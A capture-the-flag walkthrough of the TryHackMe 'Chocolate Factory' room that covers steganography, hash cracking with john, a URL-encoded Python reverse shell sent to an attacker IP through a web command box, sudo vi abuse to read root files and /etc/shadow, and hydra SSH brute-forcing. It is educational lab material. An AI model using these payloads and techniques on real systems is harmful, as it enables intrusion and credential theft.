Chocolate Factory

This room was designed so that hackers can revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa
This is a beginner friendly room!

This is Chocolate Factory from THM. It’s easy rated, although it’s not the noobiest one I’ve ever seen.

Ports

Wew, lots - there are 21 (FTP), 22 (SSH) and 80 (HTTP), plus every port from 100 to 125 inclusive.

I don’t worry about a detail scan. Firefox doesn’t like ports in the 100-ish range, saying This address is restricted. We can remove that by going to about:config and editing the network.security.ports.banned.override key. I set it to String with the value 1-60000 so hopefully I never see this warning again.

FTP

We’ve got anonymous access and there is one file: gum_room.jpg. Exiftool doesn’t give us anything useful so let’s try steghide:

root@kali:/opt/tryhackme/choc# steghide extract -sf gum_room.jpg 
Enter passphrase: 
wrote extracted data to "b64.txt".
root@kali:/opt/tryhackme/choc# cat b64.txt | base64 -d
daemon:*:18380:0:99999:7:::
bin:*:18380:0:99999:7:::
sys:*:18380:0:99999:7:::
etc, etc

This gets us a file that looks like a shadow file. It only contains one hash, for a user called charlie:

charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::
root@kali:/opt/tryhackme/choc# john hash -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REDACTED           (?)
1g 0:00:11:26 DONE (2021-01-17 21:24) 0.001455g/s 1433p/s 1433c/s 1433C/s cocker6..cn123                                                 
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I try to SSH in with this password, but it doesn’t work, hmmmm.

HTTP

At one of the ‘random’ ports in the >100 range we get this:

“Welcome to chocolate room!!
ASCII ART REMOVED
A small hint from Mr.Wonka : Look somewhere else, its not here! ;)
I hope you wont drown Augustus”

Okey dokey.

At the front page we get a login. Dirsearch gives me something more:

root@kali:/opt/tryhackme/choc# python3 /opt/dirsearch/dirsearch.py -u http://10.10.47.12
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10831

Error Log: /opt/dirsearch/logs/errors-21-01-17_21-15-29.log

Target: http://10.10.47.12/

Output File: /opt/dirsearch/reports/10.10.47.12/_21-01-17_21-15-30.txt

[21:15:30] Starting: 
Note: 403 files removed for brevity
[21:16:49] 200 -  569B  - /home.php
[21:16:51] 200 -    1KB - /index.html
[21:16:52] 200 -  273B  - /index.php.bak

What is at home.php? Home.php has a box which lets us send commands to the server, like reverse shells for example:

command=python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.9.10.123",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'

Alright then. By the way, the password we cracked for charlie works in the login page, and directs us to home.php. So yeah whatever really.

www-data

As www-data we can go to /home/charley and read a file called teleport, which is an SSH private key. It’s not password protected, so we just need to chmod 600 on it and we can login as charlie:

root@kali:/opt/tryhackme/choc# chmod 600 id_rsa
root@kali:/opt/tryhackme/choc# ssh -i id_rsa charlie@10.10.47.12
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-115-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Jan 18 02:28:51 UTC 2021

  System load:  0.0               Processes:           602
  Usage of /:   43.6% of 8.79GB   Users logged in:     0
  Memory usage: 63%               IP address for eth0: 10.10.47.12
  Swap usage:   0%
.... etc etc

Charlie

Charlie is in the admin, sudo and lxd groups, but we don’t know his password unfortunately. Linpeas gives us a few things, including:

charlie@chocolate-factory:/$ sudo -l
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi

It also draws our attention to two files in /etc/init.d that we have ownership of:

ports.sh, and
chocolate.txt

Under some circumstances these files might be a privesc in themselves, if we had the ability to reboot the box. But we don’t, since that’s not how THM rooms work. But we can read them, and in particular one line stands out:

echo “http://localhost/key_rev_key <- You will find the key here!!!” nc -lkp 113 > /dev/null &

What’s this? We can retrieve the file, and it’s a binary. We don’t need to run it; strings will be sufficient:

root@kali:/opt/tryhackme/choc# file key_rev_key 
key_rev_key: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8273c8c59735121c0a12747aee7ecac1aabaf1f0, not stripped
root@kali:/opt/tryhackme/choc# strings key_rev_key 
/lib64/ld-linux-x86-64.so.2
libc.so.6
-- removed for brevity --
Enter your name: 
laksdhfas
 congratulations you have found the key:   
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
 Keep its safe

We’ll need this shortly.

Back to the vi thing. We can use this to do some things that we otherwise wouldn’t be able to, eg get directory listings and read files, although it doesn’t seem to want to give me a shell. Anyway:

charlie@chocolate-factory:/$ sudo -u root /usr/bin/vi -c ls /root

Which gives us this:

" ============================================================================
" Netrw Directory Listing                                        (netrw v156)
"   /root
"   Sorted by      name
"   Sort sequence: [\/]$,\<core\%(\.\d\+\)\=\>,\.h$,\.c$,\.cpp$,\~\=\*$,*,\.o$,\.obj$,\.info$,\.swp$,\.bak$,\~$
"   Quick Help: <F1>:help  -:go up dir  D:delete  R:rename  s:sort-by  x:special
" ==============================================================================
../                                                                                                                                                                      
./
.cache/
.gnupg/
.local/
.ssh/
root.py*
.bash_history
.bashrc
.profile
.selected_editor

I use this (below) to read root.py:

charlie@chocolate-factory:/$ sudo -u root /usr/bin/vi -c :! /root/root.py

I copy the contents, then run the script:

root@kali:/opt/tryhackme/choc# pip install pyfiglet
root@kali:/opt/tryhackme/choc# python root.py 
root.py:1: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.fernet import Fernet
Enter the key:  b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' 

And this gave me the root flag. Done? Almost….

Footnote

While I was on the box I used the vi technique to read the shadow file and threw the hashes for root and charlie at john:

root@kali:/opt/tryhackme/choc# john hash -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Remaining 2 password hashes with 2 different salts
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REDACTED             (?)
REDACTED             (?)
2g 0:00:09:40 DONE (2021-01-17 23:02) 0.003442g/s 767.2p/s 1534c/s 1534C/s 231118..222213
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Note this says three password hashes because I used the same file that had Charlie’s other hash in it. Interestingly not only did these break fairly quickly, they were THE SAME PASSWORD. Of course, I tried to SSH in as root but that didn’t work, presumably SSH login as root with a password was disabled. Similarly, sudo su was disabled for charlie, so being in the sudoer group didn’t help. But since we knew the root password, we could just do su root instead. Win.

Next, I wanted to see just how easy it would be to bruteforce SSH for this box. The password was about 400000 entries into rockyou, so not that practical. I checked the other entries in /usr/share/seclists/Passwords and the closest I found was the Leaked-Databases/Ashley-Madison.txt file; the password we needed was about 1500 lines in. Let’s try that with Hydra:

root@kali:/opt/tryhackme/choc# hydra -l charlie -P /usr/share/seclists/Passwords/Leaked-Databases/Ashley-Madison.txt ssh://10.10.85.169
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-17 23:56:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 375853 login tries (l:1/p:375853), ~23491 tries per task
[DATA] attacking ssh://10.10.85.169:22/
[STATUS] 109.00 tries/min, 109 tries in 00:01h, 375747 to do in 57:28h, 16 active
[STATUS] 113.00 tries/min, 339 tries in 00:03h, 375517 to do in 55:24h, 16 active
[STATUS] 105.57 tries/min, 739 tries in 00:07h, 375117 to do in 59:14h, 16 active
[22][ssh] host: 10.10.85.169   login: charlie   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-18 00:09:41
root@kali:/opt/tryhackme/choc# ssh charlie@10.10.85.169
charlie@10.10.85.169s password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-115-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Jan 18 05:12:56 UTC 2021

  System load:  0.0               Processes:           594
  Usage of /:   43.6% of 8.79GB   Users logged in:     0
  Memory usage: 59%               IP address for eth0: 10.10.85.169
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Jan 18 04:49:35 2021 from 10.9.10.123
Could not chdir to home directory /home/charley: No such file or directory
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

charlie@chocolate-factory:/$ su root
Password: 
root@chocolate-factory:/# id;hostname
uid=0(root) gid=0(root) groups=0(root)
chocolate-factory

So, with the right wordlist we can bruteforce SSH on this box in a little under 10 minutes. While this was not the point of the exercise, I tend to think the passwords should probably be stronger than this.